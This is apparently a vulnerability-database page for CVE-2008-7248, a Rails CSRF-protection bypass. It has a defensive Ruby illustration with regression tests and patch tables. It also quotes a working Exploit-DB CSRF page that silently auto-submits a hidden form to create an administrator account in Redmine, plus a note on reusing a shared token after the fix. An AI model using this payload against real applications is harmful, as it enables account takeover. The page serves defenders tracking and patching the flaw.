CVE-2008-7248

unknown
Published 2017-10-24 · Modified 2024-12-07
CVSS v3: —
CVSS v4: — (not yet in upstream)
VIR risk: 1.0

Description

Ruby on Rails 2.1 before 2.1.3 and 2.2.x before 2.2.2 does not verify tokens for requests with certain content types, which allows remote attackers to bypass cross-site request forgery (CSRF) protection for requests to applications that rely on this protection, as demonstrated using text/plain.
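As an added illustration (not code from this page, from Rails, or from Exploit-DB), the following constructed Ruby models the failure mode the description names: a CSRF token check that is only performed for content types on a list, beside a hardened check that verifies every state-changing request whatever Content-Type it declares. The request shape, the token value and all function names are assumptions made for this example; the regression cases are the kind a defender would keep in a test suite to catch this class of bug.

```ruby
# Added illustration, not Rails or Exploit-DB code: a CSRF token check whose
# verification depends on the declared Content-Type, beside one that does not.
# Token value, request shape and helper names are constructed for this example.

SAFE_METHODS = %w[GET HEAD].freeze

# Content types the weak check bothers to verify. A POST declaring any other
# type (for example text/plain) skips token verification entirely, which is the
# pattern the CVE description names, reduced to its essence.
VERIFIED_TYPES = %w[application/x-www-form-urlencoded multipart/form-data].freeze

# Constant-time string comparison so token checks do not leak timing.
def secure_compare(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Weak pattern: state-changing requests are only verified when their
# Content-Type is on the list.
def verified_by_content_type?(request, expected_token)
  return true if SAFE_METHODS.include?(request[:method])
  return true unless VERIFIED_TYPES.include?(request[:content_type]) # the gap
  secure_compare(request[:token].to_s, expected_token)
end

# Hardened pattern: every request that is not GET/HEAD must present the
# session token, regardless of the Content-Type it declares.
def verified_regardless_of_type?(request, expected_token)
  return true if SAFE_METHODS.include?(request[:method])
  secure_compare(request[:token].to_s, expected_token)
end

# Regression cases a defender would keep in a test suite. Each request is a
# constructed Hash of { method:, content_type:, token: }; the result maps each
# case name to whether the given check accepts the request.
def regression_report(check, expected_token)
  cases = {
    get_no_token:    { method: 'GET',  content_type: nil, token: nil },
    form_with_token: { method: 'POST', content_type: 'application/x-www-form-urlencoded', token: expected_token },
    form_no_token:   { method: 'POST', content_type: 'application/x-www-form-urlencoded', token: nil },
    plain_no_token:  { method: 'POST', content_type: 'text/plain', token: nil },
    json_no_token:   { method: 'POST', content_type: 'application/json', token: nil }
  }
  cases.transform_values { |req| check.call(req, expected_token) }
end

# Constructed session token; a real application generates one per session.
EXAMPLE_TOKEN = 'constructed-token-0123456789abcdef'.freeze

if __FILE__ == $PROGRAM_NAME
  weak = regression_report(method(:verified_by_content_type?), EXAMPLE_TOKEN)
  hard = regression_report(method(:verified_regardless_of_type?), EXAMPLE_TOKEN)
  weak.each_key do |name|
    puts format('%-16s weak=%-5s hardened=%s', name, weak[name], hard[name])
  end
end
```

Run as a script, the report shows the weak check accepting the token-less `text/plain` and `application/json` POSTs while the hardened check rejects every non-GET request that lacks the token; the only behaviour both share is accepting GET and a form POST carrying the correct token.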

Predictions

Exploit likelihood
55%
Patch ETA
—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.


Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-33402 · remote · linux · verified · text · 2 KB
p0deje · 2009-12-14

Ruby on Rails 2.3.5 - 'protect_from_forgery' Cross-Site Request Forgery

Type: text exploit. Source: Exploit-DB
Original advisory: https://www.securityfocus.com/bid/37322/info

Ruby on Rails is prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to perform certain administrative actions, gain unauthorized access to the affected application, or delete certain data. Other attacks are also possible. 

/**
*  Redmine <= 0.8.6 CSRF Add Admin User Exploit
*  Discovered by: p0deje (http://p0deje.blogspot.com)
*  Application: http://www.redmine.org/wiki/redmine/Download
*  SA: http://www.redmine.org/news/30
*  Date: 13.11.2009
*  Versions affected: <= 0.8.6
*  Description: this is a simple exploit which exploits a CSRF vulnerability in Redmine; it creates a user account with administrative rights
*/
 
<html>
<body>
    <form method=POST action="http://www.example.com/users/new">
       <input style="display: none" type="text" value="hacker" size="25" name="user[login]" id="user_login"/>
       <input style="display: none" type="text" value="hacker" size="30" name="user[firstname]" id="user_firstname"/>
       <input style="display: none" type="text" value="hacker" size="30" name="user[lastname]" id="user_lastname"/>
       <input style="display: none" type="text" value="hacker@hacker.com" size="30" name="user[mail]" id="user_mail"/>
       <input style="display: none" type="password" size="25" name="password" id="password" value="hacker" />
       <input style="display: none" type="password" size="25" name="password_confirmation" id="password_confirmation" value="hacker" />
       <input style="display: none" type="checkbox" value="1" name="user[admin]" id="user_admin"/>
       <input style="display: none" type="hidden" value="1" name="user[admin]"/>
       <input style="display: none" type="submit" value="Create" id="commit" name="commit" />
  </form>
  <script>document.getElementById("commit").click();</script>
</body>
</html>
 
/**
*  P.S. Actually, this vulnerability wasn't fixed in Redmine 0.8.7, because the token was generated once for all the pages and all the users.
*  Thus, you can add POST data with the token of any user and the exploit will work again
*/

OS impact

Debian: fixed in 5 releases

Version    Status   Fixed in
trixie     Fixed    2.2.3-1
sid        Fixed    2.2.3-1
forky      Fixed    2.2.3-1
bullseye   Fixed    2.2.3-1
bookworm   Fixed    2.2.3-1

Package impact

Ecosystem         Package      Vulnerable               Fixed
ruby (RubyGems)   actionpack   !< 2.1.0 || <~> 2.1.3    ~> 2.1.3
ruby (RubyGems)   actionpack   >= 2.1.0, < 2.1.3        2.1.3
ruby (RubyGems)   actionpack   >= 2.2.0, < 2.2.2        2.2.2
